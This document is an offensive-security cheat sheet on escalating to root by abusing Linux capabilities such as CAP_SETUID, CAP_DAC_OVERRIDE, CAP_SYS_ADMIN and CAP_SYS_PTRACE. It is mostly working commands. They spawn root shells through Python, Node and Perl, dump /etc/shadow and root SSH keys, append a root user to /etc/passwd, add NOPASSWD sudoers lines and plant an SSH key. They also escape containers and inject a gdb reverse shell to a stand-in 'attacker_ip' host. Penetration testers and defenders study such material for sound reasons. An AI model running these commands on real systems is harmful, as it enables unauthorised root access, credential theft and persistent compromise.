Capabilities abuse

Understanding Linux Capabilities

What Makes Capabilities Dangerous

Linux capabilities provide fine-grained control over privileged operations, allowing specific elevated permissions without full root access. However, certain capabilities can be abused to gain complete root privileges, making them attractive targets for privilege escalation.

The Attack Principle: Exploit capabilities that:

• Allow privilege escalation through file operations (CAP_CHOWN, CAP_FOWNER)

• Enable arbitrary code execution with elevated privileges (CAP_SETUID, CAP_SETGID)

• Permit bypassing file system restrictions (CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH)

• Allow system administration functions (CAP_SYS_ADMIN, CAP_SYS_PTRACE)

Why This Works: Capabilities run with specific elevated privileges. If you can control a binary with dangerous capabilities, you can perform privileged operations that lead to full root access.

Capabilities Discovery and Enumeration

Finding Capabilities on Files

Basic Capability Discovery:

# Find all files with capabilities set
getcap -r / 2>/dev/null

# Find capabilities in common directories
getcap -r /usr/bin /usr/sbin /bin /sbin 2>/dev/null

# Find capabilities in user directories
getcap -r /home /tmp /var/tmp 2>/dev/null

# Check specific binary for capabilities
getcap /path/to/binary

Process Capability Analysis:

# Check current process capabilities
cat /proc/self/status | grep Cap
capsh --print

# Check capabilities of specific process
cat /proc/PID/status | grep Cap

# Decode capability hex values
capsh --decode=0000003fffffffff

Dangerous Capabilities to Look For:

# Search for the most dangerous capabilities
getcap -r / 2>/dev/null | grep -E "(cap_setuid|cap_setgid|cap_dac_override|cap_fowner|cap_chown|cap_sys_admin)"

# Check for specific high-value capabilities
getcap -r / 2>/dev/null | grep -E "(setuid|setgid|dac_override|sys_admin|sys_ptrace)"

High-Value Capability Exploits

CAP_SETUID - Direct Root Access

Why CAP_SETUID is Critical: Allows changing user ID to any user, including root (UID 0).

Python with CAP_SETUID:

# If python has cap_setuid
getcap /usr/bin/python3
# Should show: /usr/bin/python3 = cap_setuid+ep

# Exploit to gain root
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"

Custom Binary with CAP_SETUID:

# If you find any binary with cap_setuid, check if it's exploitable
# Many interpreters and utilities with this capability can spawn root shells

# For binaries that accept scripts or commands
/path/to/binary_with_setuid -c "import os; os.setuid(0); os.system('/bin/bash')"

CAP_SETGID - Group-Based Escalation

Exploiting CAP_SETGID:

# Change to privileged groups (shadow, disk, etc.)
python3 -c "import os; os.setgid(0); os.system('/bin/bash')"

# Or target specific powerful groups
python3 -c "import os; os.setgid(42); os.system('/bin/bash')"  # shadow group
python3 -c "import os; os.setgid(6); os.system('/bin/bash')"   # disk group

CAP_DAC_OVERRIDE - File System Bypass

Why CAP_DAC_OVERRIDE is Powerful: Bypasses all file read, write, and execute permission checks.

File System Exploitation:

# If binary has cap_dac_override, it can read/write any file
# Check for interpreters with this capability

# Read sensitive files
python3 -c "print(open('/etc/shadow').read())"
python3 -c "print(open('/root/.ssh/id_rsa').read())"

# Write to system files
python3 -c "open('/etc/passwd', 'a').write('hacker:x:0:0:root:/root:/bin/bash\n')"

# Modify sudoers file
python3 -c "open('/etc/sudoers', 'a').write('$USER ALL=(ALL) NOPASSWD:ALL\n')"

CAP_FOWNER - File Ownership Manipulation

Exploiting CAP_FOWNER:

# Change ownership of system files
python3 -c "import os; os.chown('/etc/passwd', 1000, 1000)"
python3 -c "import os; os.chown('/etc/shadow', 1000, 1000)"

# Change permissions after taking ownership
python3 -c "import os; os.chown('/bin/bash', 1000, 1000); os.chmod('/bin/bash', 0o4755)"

CAP_CHOWN - Ownership Changes

Taking Control of System Files:

# Change ownership of critical files to current user
python3 -c "import os; os.chown('/etc/sudoers', os.getuid(), os.getgid())"

# Then modify the file
echo "$USER ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

CAP_SYS_ADMIN - System Administration Access

Why CAP_SYS_ADMIN is Dangerous: Provides numerous system administration capabilities including mount operations.

Mount-Based Escalation:

# If binary has cap_sys_admin, it can perform mount operations
# Create container-style escalation

# Mount /etc from host (if in container)
python3 -c "import os; os.system('mount -t proc proc /proc')"

# Access host filesystem through /proc/1/root
python3 -c "import os; os.chroot('/proc/1/root'); os.system('/bin/bash')"

Interpreter-Specific Exploits

Python Capabilities

Common Python Capability Exploits:

# CAP_SETUID exploitation
python3 -c "import os; os.setuid(0); os.execl('/bin/bash', 'bash')"

# CAP_DAC_OVERRIDE for file access
python3 -c "
import os
# Read any file
with open('/etc/shadow') as f: print(f.read())
# Write to any file  
with open('/etc/passwd', 'a') as f: f.write('hacker:x:0:0::/root:/bin/bash\n')
"

# CAP_SYS_ADMIN for mount operations
python3 -c "
import os, subprocess
subprocess.call(['mount', '-t', 'tmpfs', 'tmpfs', '/mnt'])
os.chroot('/mnt')
os.system('/bin/bash')
"

Node.js Capabilities

Node.js Capability Exploitation:

# If node has dangerous capabilities
node -e "process.setuid(0); require('child_process').spawn('/bin/bash', {stdio: [0, 1, 2]})"

# File operations with CAP_DAC_OVERRIDE
node -e "
const fs = require('fs');
fs.appendFileSync('/etc/passwd', 'hacker:x:0:0::/root:/bin/bash\n');
"

Perl Capabilities

Perl Capability Exploitation:

# CAP_SETUID with Perl
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash"'

# File manipulation
perl -e 'open(F, ">>/etc/passwd"); print F "hacker:x:0:0::/root:/bin/bash\n"; close(F);'

Binary-Specific Capability Abuse

tar with Capabilities

tar + CAP_DAC_OVERRIDE:

# Create archive of sensitive files
tar -czf /tmp/sensitive.tar.gz /etc/shadow /root/.ssh/

# Extract with different ownership (if combined with CAP_CHOWN)
tar -xzf archive.tar.gz --same-owner

gdb with CAP_SYS_PTRACE

Process Debugging Escalation:

# If gdb has cap_sys_ptrace, attach to root processes
gdb -p $(pgrep -u root | head -1)

# Within gdb, execute system commands
(gdb) call system("/bin/bash")
(gdb) call execl("/bin/bash", "bash", (char *)0)

Capability-Based File Operations

Reading Sensitive Files

High-Value Target Files:

# With CAP_DAC_OVERRIDE or CAP_DAC_READ_SEARCH
python3 -c "
import os
targets = ['/etc/shadow', '/root/.ssh/id_rsa', '/etc/sudoers', '/root/.bash_history']
for target in targets:
    try:
        with open(target) as f:
            print(f'=== {target} ===')
            print(f.read())
    except:
        pass
"

Writing Critical System Files

System File Modification:

# Add root user to passwd
python3 -c "open('/etc/passwd', 'a').write('hacker:\$6\$salt\$hash:0:0:root:/root:/bin/bash\n')"

# Modify sudoers
python3 -c "open('/etc/sudoers', 'a').write('$USER ALL=(ALL) NOPASSWD:ALL\n')"

# Add SSH key to root
python3 -c "
import os
os.makedirs('/root/.ssh', exist_ok=True)
open('/root/.ssh/authorized_keys', 'a').write('ssh-rsa YOUR_KEY_HERE\n')
os.chmod('/root/.ssh/authorized_keys', 0o600)
"

Container Escape via Capabilities

Container Capability Abuse

CAP_SYS_ADMIN Container Escape:

# If container has CAP_SYS_ADMIN
# Mount host filesystem
mkdir /tmp/host
mount /dev/sda1 /tmp/host
chroot /tmp/host bash

# Alternative: Access through /proc
ls /proc/1/root/
chroot /proc/1/root bash

CAP_SYS_PTRACE Container Escape:

# Attach to process on host
gdb -p 1
(gdb) call system("bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'")

Capability Exploitation Strategies

Prioritizing Capability Targets

High-Priority Capabilities (Immediate Root):

1. CAP_SETUID - Direct root access

2. CAP_SYS_ADMIN - System-level control

3. CAP_DAC_OVERRIDE - Bypass all file permissions

Medium-Priority Capabilities (File-Based Escalation): 4. CAP_FOWNER - Change file ownership 5. CAP_CHOWN - Change file ownership 6. CAP_SETGID - Group-based escalation

Exploitation Strategy:

# 1. Find capabilities
getcap -r / 2>/dev/null > /tmp/caps.txt

# 2. Check for high-priority capabilities first
grep -E "(setuid|sys_admin|dac_override)" /tmp/caps.txt

# 3. Test exploitation based on binary type
# - Interpreters (python, node, perl): Direct code execution
# - System tools (tar, gdb): Tool-specific abuse
# - Custom binaries: Research specific functionality

Key Operational Considerations

Success Indicators

• Capability presence confirmed on exploitable binaries

• Code execution achieved with elevated capabilities

• File system access to previously restricted files

• Process privilege escalation confirmed with id

Common Failure Points

• No dangerous capabilities found on accessible binaries

• Capabilities present but binary doesn't accept arbitrary input

• Modern protections (seccomp, AppArmor) prevent capability abuse

• Container restrictions limit capability effectiveness

Exploitation Notes

• Interpreters are gold - Python, Node.js, Perl with capabilities are easily exploitable

• CAP_SETUID is king - Direct path to root if found

• Container environments often have relaxed capability restrictions

• Custom binaries may have capabilities but limited exploitation options

Capability abuse represents a powerful but often overlooked privilege escalation vector, particularly valuable in containerized environments where traditional SUID binaries may be restricted but capabilities are still present.